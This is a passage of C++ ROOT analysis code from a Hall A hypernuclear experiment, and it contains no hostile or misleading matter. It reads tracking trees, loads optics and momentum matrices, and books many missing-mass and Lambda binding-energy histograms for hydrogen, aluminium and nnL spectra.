double delta_tt_pk_3[max];//// May 01, 2021 , tt means T/T
double pep_tt_real_3[max];//// May 01, 2021 , tt means T/T
double pk_tt_real_3[max];//// May 01, 2021 , tt means T/T
double mm_3;
double mm_t;
double mm_Al;
double mm_Al1;
double a1_3, a2_3;
double mm_h;
double hallap_3;
double l_th_fp_3[max];
double l_ph_fp_3[max];
double l_x_fp_3[max];
double l_y_fp_3[max];
double r_th_fp_3[max];
double r_ph_fp_3[max];
double r_x_fp_3[max];
double r_y_fp_3[max];
double ctime_3;
double z_av_3[nmax];
double z_av_1_3[nmax];
//)))))))))))))))))))))))))))))))) t3 variables up to here ))))))))))))))))))))))))))))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((( t1 branch address (((((((((((((((((((((((((((((((((((((((((((((((((((
t1->SetBranchAddress("HALLA_p", &hallap);
t1->SetBranchAddress("DR.T5", &trig5);
t1->SetBranchAddress("L.tr.x", &l_x_fp);
t1->SetBranchAddress("L.tr.y", &l_y_fp);
t1->SetBranchAddress("L.tr.th", &l_th_fp);
t1->SetBranchAddress("L.tr.ph", &l_ph_fp);
t1->SetBranchAddress("R.tr.x", &r_x_fp);
t1->SetBranchAddress("R.tr.y", &r_y_fp);
t1->SetBranchAddress("R.tr.th", &r_th_fp);
t1->SetBranchAddress("R.tr.ph", &r_ph_fp);
t1->SetBranchAddress("coin_time", &ctime);
t1->SetBranchAddress("ztR_wRC", &rvz);
t1->SetBranchAddress("ztL_wRC", &lvz);
t1->SetBranchAddress("R.a1.asum_c", &a1);
t1->SetBranchAddress("R.a2.asum_c", &a2);
// (((((((((((((((((((((((((((((((( t2 (((((((((((((((((((((((((((((((((((((((((((((((((((
t2->SetBranchAddress("HALLA_p", &hallap_2);
t2->SetBranchAddress("DR.T5", &trig5_2);
t2->SetBranchAddress("L.tr.x", &l_x_fp_2);
t2->SetBranchAddress("L.tr.y", &l_y_fp_2);
t2->SetBranchAddress("L.tr.th", &l_th_fp_2);
t2->SetBranchAddress("L.tr.ph", &l_ph_fp_2);
t2->SetBranchAddress("R.tr.x", &r_x_fp_2);
t2->SetBranchAddress("R.tr.y", &r_y_fp_2);
t2->SetBranchAddress("R.tr.th", &r_th_fp_2);
t2->SetBranchAddress("R.tr.ph", &r_ph_fp_2);
t2->SetBranchAddress("coin_time", &ctime_2);
t2->SetBranchAddress("ztR_wRC", &rvz_2);
t2->SetBranchAddress("ztL_wRC", &lvz_2);
t2->SetBranchAddress("R.a1.asum_c", &a1_2);
t2->SetBranchAddress("R.a2.asum_c", &a2_2);
//)))))))))))))))))))))))))))))))) t2 ))))))))))))))))))))))))))))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((( t3 ((((((((((((((((((((((((((((((((((((((((((((((((((( Jan_02
t3->SetBranchAddress("HALLA_p", &hallap_3);
t3->SetBranchAddress("DR.T5", &trig5_3);
t3->SetBranchAddress("L.tr.x", &l_x_fp_3);
t3->SetBranchAddress("L.tr.y", &l_y_fp_3);
t3->SetBranchAddress("L.tr.th", &l_th_fp_3);
t3->SetBranchAddress("L.tr.ph", &l_ph_fp_3);
t3->SetBranchAddress("R.tr.x", &r_x_fp_3);
t3->SetBranchAddress("R.tr.y", &r_y_fp_3);
t3->SetBranchAddress("R.tr.th", &r_th_fp_3);
t3->SetBranchAddress("R.tr.ph", &r_ph_fp_3);
t3->SetBranchAddress("coin_time", &ctime_3);
t3->SetBranchAddress("ztR_wRC", &rvz_3);
t3->SetBranchAddress("ztL_wRC", &lvz_3);
t3->SetBranchAddress("R.a1.asum_c", &a1_3);
t3->SetBranchAddress("R.a2.asum_c", &a2_3);
//)))))))))))))))))))))))))))))))) t3 barnch address up to here ))))))))))))))))))))))))))))))))))))))))))))))))))))))
TFile* fnew = new TFile("./output_root/paper_prep.root","recreate");
TTree* tnew = new TTree("tree","For z calibration (LHRS)");
tnew->Branch("HALLA_p", &hallap,"HALLA_p/D");
tnew->Branch("L.tr.vz", &lvz, "L.tr.vz[100]/D");
tnew->Branch("L.tr.x", &l_x_fp, "L.tr.x[100]/D");
tnew->Branch("L.tr.y", &l_y_fp, "L.tr.y[100]/D");
tnew->Branch("L.tr.th", &l_th_fp,"L.tr.th[100]/D");
tnew->Branch("L.tr.ph", &l_ph_fp,"L.tr.ph[100]/D");
tnew->Branch("L.tr.tg_th_TH2", &th2, "L.tr.tg_th_TH2[100]/D");
tnew->Branch("L.tr.tg_ph_PH2", &ph2, "L.tr.tg_ph_PH2[100]/D");
double XFP, XpFP;
double YFP, YpFP;
double R_XFP, R_XpFP;
double R_YFP, R_YpFP;
// ((((((((((((((((((((((((((((((((((((((((((( for t2 ((((((((((
double XFP_2, XpFP_2;
double YFP_2, YpFP_2;
double R_XFP_2, R_XpFP_2;
double R_YFP_2, R_YpFP_2;
//)))))))))))))))))))))))))))))))))))))))))))))
// ((((((((((((((((((((((((((((((((((((((((((( for t3 (((((((((( Jan_02
double XFP_3, XpFP_3;
double YFP_3, YpFP_3;
double R_XFP_3, R_XpFP_3;
double R_YFP_3, R_YpFP_3;
//)))))))))))))))))))))))))))))))))))))))))))))
// ((((((((((((((((((((((((((((((((((((((((((( for t2 ((((((((((
double XFP_4, XpFP_4;
double YFP_4, YpFP_4; // jan 07 2020
double R_XFP_4, R_XpFP_4;
double R_YFP_4, R_YpFP_4;
// ===============or LHRS theta information input==========
ntune_event = 0;
for(int i=0 ; i<Total_Par; i++){
thetaL_opt[i] = -2222.0;
}
char name_Angle_L[500];
// sprintf(name_Angle_L,"./matrices/theta_3rd_LHRS_Opt_7.dat");//theta_3rd_LHRS_Opt_7.dat
sprintf(name_Angle_L,"./matrices/theta_L4th_4th_6.dat");// optimized on OCT 23, 2019 with SS data
ifstream Angle_L(name_Angle_L);
double Theta_L[Total_Par];
for(int i =0; i<Total_Par;i++){
double par1 =0.0;
int p1 =0;
Angle_L>>par1>>p1>>p1>>p1>>p1>>p1;
Theta_L[i]=par1;
thetaL_opt[i] = Theta_L[i];
}
Angle_L.close();
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
// for LHRS phi information input
//--------------------------------------------------------
ntune_event = 0;
for(int i =0;i<Total_Par;i++){
phiL_opt[i] = -2222.0;
}
char name_angle_phi[500];
// sprintf(name_angle_phi,"./matrices/phi_LHRS_3rd_Opt_9.dat");
sprintf(name_angle_phi,"./matrices/phi_L4th_5th_5.dat");// optimized on OCT 23, 2019
ifstream angle_phi(name_angle_phi);
double PHI_L[Total_Par];
for(int i =0; i<Total_Par;i++){
double par2 =0.0;
int p2 =0;
angle_phi>>par2>>p2>>p2>>p2>>p2>>p2;
PHI_L[i] = par2;
phiL_opt[i]= PHI_L[i];
}
angle_phi.close();
// LHRS momentum information========================July 20, 2019
ntune_event = 0;
for(int i =0;i<Mom_Par;i++){
momL_opt[i] = -2222.0;
}
char name_Mom_lhrs[500];
// sprintf(name_Mom_lhrs,"./MOM_MATRICES/LMOM5_1st_0.dat"); /// Previously optimized without Al Data May 02, 2021
sprintf(name_Mom_lhrs,"./MOM_MATRICES/LMOM5_Aug14_4th_0.dat");// tuned with Al data (no shift is included)
ifstream Mom_lhrs(name_Mom_lhrs);
double mom_L[Mom_Par];
for(int i = 0; i<Mom_Par;i++){
double par5 = 0.0;
int p5 =0;
Mom_lhrs>>par5>>p5>>p5>>p5>>p5>>p5;
mom_L[i]= par5;
momL_opt[i] = mom_L[i];
}
Mom_lhrs.close();
// up to here thelhrs momentum matrix======================
// =======RHRS theta input information
ntune_event =0;
for(int i =0;i<Total_Par;i++){
thetaR_opt[i] = -2222.0;
}
char name_Angle_R[500];
sprintf(name_Angle_R,"./All_Matrices/xpt_RHRS_4_upto2.dat"); //This is the RHRS Phi matrix optimized by Gogami with ss data
ifstream Angle_R(name_Angle_R);
double Theta_R[Total_Par];
for(int i =0; i<Total_Par;i++){
double par3 =0.0;
int p3 = 0;
Angle_R>>par3>>p3>>p3>>p3>>p3>>p3;
Theta_R[i]=par3;
thetaR_opt[i] = Theta_R[i];
}
Angle_R.close();
//====================================================
//=======RHRS phi input information===============
ntune_event = 0;
for(int i =0;i<Total_Par;i++){
phiR_opt[i] = -2222.0;
}
char name_phi_Rhrs[500];
sprintf(name_phi_Rhrs,"./All_Matrices/ypt_RHRS_4_upto2.dat"); //This is the RHRS Phi matrix optimized by Gogami with ss data
ifstream phi_Rhrs(name_phi_Rhrs);
double PHI_R[Total_Par];
for(int i =0; i<Total_Par;i++){
double par4 =0.0;
int p4 =0;
phi_Rhrs>>par4>>p4>>p4>>p4>>p4>>p4;
PHI_R[i] = par4;
phiR_opt[i]= PHI_R[i];
}
phi_Rhrs.close();
//==================================================
// =====RHRS momentum recon==========================6
ntune_event = 0;
for(int i =0;i<Mom_Par;i++){
momR_opt[i] = -2222.0;
}
char name_Mom_rhrs[500];
// sprintf(name_Mom_rhrs,"./MOM_MATRICES/RMOM5_2nd_0.dat"); // Optimized without Al data May 02, 2021
sprintf(name_Mom_rhrs,"./MOM_MATRICES/RMOM5_July8_1st_0.dat");// tuned with Al data (no shift is included)
ifstream Mom_rhrs(name_Mom_rhrs);
double mom_R[Mom_Par];
for(int i = 0; i<Mom_Par;i++){
double par6 = 0.0;
int p6 =0;
Mom_rhrs>>par6>>p6>>p6>>p6>>p6>>p6;
mom_R[i]= par6;
momR_opt[i] = mom_R[i];
}
Mom_rhrs.close();
// =====RHRS momentum recon up to here===============
gStyle->SetTickLength(0.055,"X");
TH1F *h = new TH1F("h"," ;Missing Mass(MeV/c^{2});Counts/ 0.75MeV ",333,1025,1275); // to plot lambda and sigma (H/H data)
TH1F *h_2 = new TH1F("h_2"," ;Missing Mass(MeV/c^{2});Counts/ 0.75MeV ",333,1025,1275); //Lambda (H/T data)
TH1F *hh = new TH1F("hh","Al Spectrum, H/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",208,-100,212);
TH1F *ht = new TH1F("ht","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",208,-100,212);
TH1F *htt = new TH1F("htt","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",208,-100,212);
TH1F *hb = new TH1F("hb","Al Spectrum, H/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",208,-100,212);
TH1F *hb1 = new TH1F("hb1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",208,-100,212);
TH1F *hb2 = new TH1F("hb2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",208,-100,212);
TH1F *hal_15 = new TH1F("hal_15","Al Spectrum,(H/T + T/T data) ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",151,-100,202);
TH1F *hal_15_1 = new TH1F("hal_15_1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",151,-100,202);
TH1F *hal_15_2 = new TH1F("hal_15_2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/2.0 MeV ",151,-100,202);
TH1F *hbal_15 = new TH1F("hbal_15","Al Spectrum, H/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",151,-100,202);
TH1F *hbal_15_1 = new TH1F("hbal_15_1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",151,-100,202);
TH1F *hbal_15_2 = new TH1F("hbal_15_2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/2.0 MeV ",151,-100,202);
TH1F *h_al = new TH1F("h_al","Al Spectrum, H/T data ; -B_{#Lambda}(MeV);Counts/ 1.25 MeV ",240,-100,200);
TH1F *h_al1 = new TH1F("h_al1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 1.25 MeV ",240,-100,200);
TH1F *h_al2 = new TH1F("h_al2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/ 1.25 MeV ",240,-100,200);
TH1F *hb_al = new TH1F("hb_al","Al Spectrum, H/T data ; -B_{#Lambda}(MeV);Counts/ 1.25 MeV ",240,-100,200);
TH1F *hb_al1 = new TH1F("hb_al1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 1.25 MeV ",240,-100,200);
TH1F *hb_al2 = new TH1F("hb_al2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/MeV ",240,-100,200);
TH1F *hal_20 = new TH1F("hal_20","Al Spectrum (H/T+T/T data) ; -B_{#Lambda}(MeV);Counts/2 MeV ",155,-100,210);
TH1F *hal_20_1 = new TH1F("hal_20_1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2 MeV ",155,-100,210);
TH1F *hal_20_2 = new TH1F("hal_20_2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/2 MeV ",155,-100,210);
TH1F *hbal_20 = new TH1F("hbal_20","Al Spectrum, H/T data ; -B_{#Lambda}(MeV);Counts/2 MeV ",155,-100,210);
TH1F *hbal_20_1 = new TH1F("hbal_20_1","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2 MeV ",155,-100,210);
TH1F *hbal_20_2 = new TH1F("hbal_20_2","Al Spectrum(H/T + T/T data); -B_{#Lambda}(MeV);Counts/2 MeV ",155,-100,210);
TH1F *h20 = new TH1F("h20","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",204,-103,203);
TH1F *h21 = new TH1F("h21","Al Spectrum,H/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",204,-103,203);
TH1F *HT = new TH1F("HT","Al Spectrum( H/T+ TT data); -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",204,-103,203);
TH1F *h20_b = new TH1F("h20_b","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",204,-103,203);
TH1F *h21_b = new TH1F("h21_b","Al Spectrum,H/T data ; -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",204,-103,203);
TH1F *HT_b = new TH1F("HT_b","Al Spectrum( H/T+ TT data); -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",204,-103,203);
TH1F *hd = new TH1F("hd","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",202,-100.5,202.5);//need here
TH1F *he = new TH1F("he","Al Spectrum,H/T data ; -B_{#Lambda}(MeV);Counts/1.5MeV ",202,-100.5,202.5);
TH1F *hf = new TH1F("hf","Al Spectrum(H/T+ TT); -B_{#Lambda}(MeV);Counts/1.5MeV ",202,-100.5,202.5);
TH1F *hb5 = new TH1F("hb5","Al Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",202,-100.5,202.5);
TH1F *hb6 = new TH1F("hb6","Al Spectrum,H/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",202,-100.5,202.5);
TH1F *hb7 = new TH1F("hb7","Al Spectrum(H/T+ TT); -B_{#Lambda}(MeV);Counts/ 1.5 MeV ",202,-100.5,202.5);
TH1F *h50 = new TH1F("h50","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-100.5,149.5);
TH1F *h50b = new TH1F("h50b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-100.5,149.5);
TH1F *h25_2 = new TH1F("h25_2","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",102,-99.5,154.5);
TH1F *h25_2b = new TH1F("h25_2b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",102,-99.5,154.5);
TH1F *h30_1 = new TH1F("h30_1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.3 MeV ",110,-100,153);
TH1F *h30_2 = new TH1F("h30_2","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.3 MeV ",110,-101,152);
TH1F *h30_3 = new TH1F("h30_3","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.3 MeV ",110,-99,154);
TH1F *h35_1 = new TH1F("h35_1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.35 MeV ",108,-100,154);
TH1F *h35_2 = new TH1F("h35_2","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.35 MeV ",108,-104,150);
TH1F *h35_3 = new TH1F("h35_3","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.35 MeV ",108,-99,155);
TH1F *h35_4 = new TH1F("h35_4","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.35 MeV ",108,-98,156);
TH1F *h54 = new TH1F("h54","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2 MeV ",125,-100,150);
TH1F *hb54 = new TH1F("hb54","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2 MeV ",125,-100,150);
TH1F *h1_2 = new TH1F("h1_2","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",128,-104,152); // C/1.52 in really
TH1F *h1_2b = new TH1F("h1_2b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",128,-104,152); // C/1.52 in really
TH1F *h1_qu = new TH1F("h1_qu","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.6 MeV ",160,-100,156);
TH1F *h1_qub = new TH1F("h1_qub","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.6 MeV ",160,-100,156);
TH1F *h1_q1 = new TH1F("h1_q1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-102,150);
TH1F *h1_qb1 = new TH1F("h1_qb1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-102,150);
/////////////////////++++++++++ Dec01, 2020&&&&&&&&&&&&&&&&&&##################@@@@@@@@@@@@@@@@@!!!!!!!!!
TH1F *h1_0 = new TH1F("h1_0","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",174,-110,151);
TH1F *h1_01 = new TH1F("h1_01","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-100,150);
TH1F *h1_01b = new TH1F("h1_01b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-100,150);
TH1F *h1_may = new TH1F("h1_may","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",173,-103.55,156.35);
TH1F *h1b_may = new TH1F("h1b_may","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",173,-103.55,156.35);
TH1F *h1_02 = new TH1F("h1_02","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",100,-100.25,150.1);
TH1F *h1_02b = new TH1F("h1_02b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",100,-100.25,150.1);
TH1F *h1_03 = new TH1F("h1_03","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",127,-102.,153.);
TH1F *h1_03b = new TH1F("h1_03b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",127,-102.5,153.);
TH1F *h1_04 = new TH1F("h1_04","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",102,-105,150);
TH1F *h1_05 = new TH1F("h1_05","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",102,-100,155);
TH1F *h1_05b = new TH1F("h1_05b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.5 MeV ",102,-100,155);
TH1F *h150_1 = new TH1F("h150_1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",130,-100,160);
TH1F *h150_1b = new TH1F("h150_1b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",130,-100,160);
TH1F *h150_2 = new TH1F("h150_2","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",126,-101,151);
TH1F *h150_2b = new TH1F("h150_2b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",126,-101,151);
TH1F *h150_3 = new TH1F("h150_3","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",127,-102,152);
TH1F *h150_4 = new TH1F("h150_4","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",130,-105,155);
TH1F *h150_5 = new TH1F("h150_5","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",125,-100,150);
TH1F *h150_6 = new TH1F("h150_6","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.0 MeV ",132,-104,160);
TH1F *h125_1 = new TH1F("h125_1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",112,-100,152);
TH1F *h125_2 = new TH1F("h125_2","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",112,-104,148);
TH1F *h125_3 = new TH1F("h125_3","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",112,-102,150);
TH1F *h125_3b = new TH1F("h125_3b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",112,-102,150);
TH1F *h125_4 = new TH1F("h125_4","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",112,-105,147);
TH1F *h125_4b = new TH1F("h125_4b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",112,-105,147);
TH1F *h125_5 = new TH1F("h125_5","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",116,-103,158);
TH1F *h125_5b = new TH1F("h125_5b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/2.25 MeV ",116,-103,158);
TH1F *h125_6 = new TH1F("h125_6","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",173,-103.55,156.35);
TH1F *h125_6b = new TH1F("h125_6b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",173,-103.55,156.35);
/////////////////////++++++++++ Dec01, 2020&&&&&&&&&&&&&&&&&&##################@@@@@@@@@@@@@@@@@!!!!!!!!!
TH1F *h_75_1 = new TH1F("h_75_1","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 0.76 MeV ",350,-100,166);
TH1F *h_75_3 = new TH1F("h_75_3","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 0.76 MeV ",350,-103,163);
TH1F *h_75_1b = new TH1F("h_75_1b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 0.76 MeV ",350,-100,166);
TH1F *h_75_3b = new TH1F("h_75_3b","nnL Spectrum, T/T data ; -B_{#Lambda}(MeV);Counts/ 0.76 MeV ",350,-103,163);
// H contamination
TH1F *h_h = new TH1F("h_h"," ;-B_{#Lambda}(MeV);Counts / 1.5 MeV ",134,-101,100); // H in T/T data or to see H contamination
TH1F *h_hbg = new TH1F("h_hbg"," ;-B_{#Lambda}(MeV);Counts / 1.5 MeV ",134,-101,100);// bg in H contamination
TH1F *h_hc0 = new TH1F("h_hc0"," H Contamination;-B_{#Lambda}(MeV);Counts / 1.5 MeV ",120,-90,90);
TH1F *h_hc0b = new TH1F("h_hc0b","H Contamination;-B_{#Lambda}(MeV);Counts / 1.5 MeV ",120,-90,90);
TH1F *h_hc1 = new TH1F("h_hc1"," H Contamination;-B_{#Lambda}(MeV);Counts / 1.5 MeV ",128,-96,96);
TH1F *h_hc1b = new TH1F("h_hc1b","H contamination;-B_{#Lambda}(MeV);Counts / 1.5 MeV ",128,-96,96);
TH1F *H_T = new TH1F("H_T","H in T/T data ;-B_{#Lambda}(MeV);Counts/ 1.52MeV ",150,-100,128);
TH1F *H_TB = new TH1F("H_TB","H in T/T data ;-B_{#Lambda}(MeV);Counts/ 1.52MeV ",150,-100,128);
TH1F *h53_t = new TH1F("h53_t","nnL Spectrum, T/T data(-100.5, 151.5) ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",168,-100.5,151.5);
TH1F *h53_tb = new TH1F("h53_tb","nnL Spectrum, T/T data(-100.5, 151.5) ; -B_{#Lambda}(MeV);Counts/1.5 MeV ",168,-100.5,151.5);
gStyle->SetOptStat(111111);
TH1F *h_1 = new TH1F("h_1"," ",120,1000, 1300);
h->GetXaxis()->SetTitle("Missing Mass (MeV/c^{2})"); // HH data for lambda and sigma
h->GetXaxis()->SetTitleSize(0.07);
h->GetXaxis()->SetTitleFont(62);// 32 gives the times italic bold
h->GetXaxis()->SetTitleOffset(1.05);
h->GetXaxis()->CenterTitle();
h->GetXaxis()->SetLabelSize(0.06);
h->GetYaxis()->SetTitle("Counts / 0.75 MeV");
h->GetYaxis()->CenterTitle();
h->GetYaxis()->SetTitleSize(0.07);
h->GetYaxis()->SetTitleFont(62);// 32 gives the times italic bold
h->GetYaxis()->SetTitleOffset(0.80);
h->GetYaxis()->SetLabelSize(0.06);
h_h->GetXaxis()->SetTitle("-B_{#Lambda} (MeV)"); // Tritium target for H kinematics to see the H contamination
h_h->GetXaxis()->SetTitleSize(0.07);
h_h->GetXaxis()->SetTitleFont(62);// 32 gives the times italic bold
h_h->GetXaxis()->SetTitleOffset(0.85);
h_h->GetXaxis()->CenterTitle();
h_h->GetXaxis()->SetLabelSize(0.06);
h_h->GetYaxis()->SetTitle("Counts / 1.5 MeV");
h_h->GetYaxis()->CenterTitle();
h_h->GetYaxis()->SetTitleSize(0.07);
h_h->GetYaxis()->SetTitleFont(62);// 32 gives the times italic bold
h_h->GetYaxis()->SetTitleOffset(0.70);
h_h->GetYaxis()->SetLabelSize(0.06);
TH1F *h6 = new TH1F("h6",";RHRS reconstructed Momentum;Counts/ 14.4 mev",250,1.7,2.0);
char tempc[500];
// ======================================================
bool rtrig = false;
for(int i=0; i<nmax; i++){
x[i] = -2222.0;
y[i] = -2222.0;
xp[i] = -2222.0;
yp[i] = -2222.0;
z_av[i] = -2222.0;
z_av_1[i] = -2222.0;
phir[i] = -2222.0;
phil[i] = -2222.0;
z_recon[i] = -2222.0; /// Jan 04, 2019
foil_flag[i] = -1;
}
// ((((((((((((((((((((((((((((((((((((((((((((
bool rtrig_2 = false;
for(int i=0; i<nmax_2; i++){
x_2[i] = -2222.0;
y_2[i] = -2222.0;
xp_2[i] = -2222.0;
yp_2[i] = -2222.0;
z_av_2[i] = -2222.0;
z_av_1_2[i] = -2222.0;
phir_2[i] = -2222.0;
phil_2[i] = -2222.0;
z_recon_2[i] = -2222.0; ///Jan 04, 2019
foil_flag_2[i] = -1;
x_4[i] = -2222.0;
y_4[i] = -2222.0;
xp_4[i] = -2222.0;
yp_4[i] = -2222.0;
phir_4[i] = -2222.0;
phil_4[i] = -2222.0;
z_recon_4[i] = -2222.0; ///Jan 04, 2019
foil_flag_4[i] = -1;
}
// +++++++++++++++++++++++++ for t1 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
for (int i=0; i< ent; i++){
for(int j=0; j<max; j++){
l_x_fp[j] = -2222.0;
l_th_fp[j] = -2222.0;
l_y_fp[j] = -2222.0;
l_ph_fp[j] = -2222.0;
th1[j] = -2222.0;
th2[j] = -2222.0;
ph1[j] =-2222.0;
ph2[j] =-2222.0;
delta_pep[j]= -2222.0;
pep_real[j] =-2222.0;
delta_pk[j]= -2222.0;
pk_real[j] = -2222.0;
r_x_fp[j] = -2222.0;
r_th_fp[j] = -2222.0;
r_y_fp[j] = -2222.0;
r_ph_fp[j] = -2222.0;
trig5[j] = 0.0;
rtrig = false;
}
trig5[0] = 0.0;
rtrig = false;
t1->GetEntry(i);
if(trig5[0]>1.0) rtrig = true; //JUly 01, 2019
else rtrig = false;
z_av[0] = (lvz[0] + rvz[0])/2.0;
z_av_1[0] = z_av[0];
XFP = l_x_fp[0];
XpFP = l_th_fp[0];
YFP = l_y_fp[0];
YpFP = l_ph_fp[0];
R_XFP = r_x_fp[0];
R_XpFP = r_th_fp[0];
R_YFP = r_y_fp[0];
R_YpFP = r_ph_fp[0];
if(rtrig==true && fabs(ctime)<1.0 && fabs(lvz[0]-rvz[0])<0.040 & fabs(z_av_1[0])<0.10){ // to plot lambda and sigma
XFP = (XFP-XFPm)/XFPr;
XpFP = (XpFP-XpFPm)/XpFPr;
YFP = (YFP-YFPm)/YFPr;
YpFP = (YpFP-YpFPm)/YpFPr;
R_XFP = (R_XFP-XFPm)/XFPr;
R_XpFP = (R_XpFP-XpFPm)/XpFPr;
R_YFP = (R_YFP-YFPm)/YFPr;
R_YpFP = (R_YpFP-YpFPm)/YpFPr;
z_av[0] =(z_av[0]- Ztm)/Ztr;
th2[0] = calcf2t_th(Theta_L, XFP, XpFP, YFP, YpFP, z_av_1[0]);
th2[0] = th2[0]*Xptr + Xptm;
ph2[0] = calcf2t_ph(PHI_L, XFP, XpFP, YFP, YpFP, z_av_1[0] );
ph2[0] = ph2[0]*Yptr + Yptm;
momL[0] = calcf2t_mom(mom_L, XFP, XpFP, YFP, YpFP, z_av[0]);
momL[0] = momL[0]*Momr + Momm;
par_ep[1] = -th2[0]; // right handed system
par_ep[2] = -ph2[0]; // right handed system
double holiang;
// Target struggling LHRS step #7
if(z_av_1[0]<8.0e-2){
holiang = par_ep[2] + hrs_ang;
holiang=-holiang;
delta_pep[0] = -1.35758 * sin(-4.59571 * holiang) + 2.09093;
}
else{
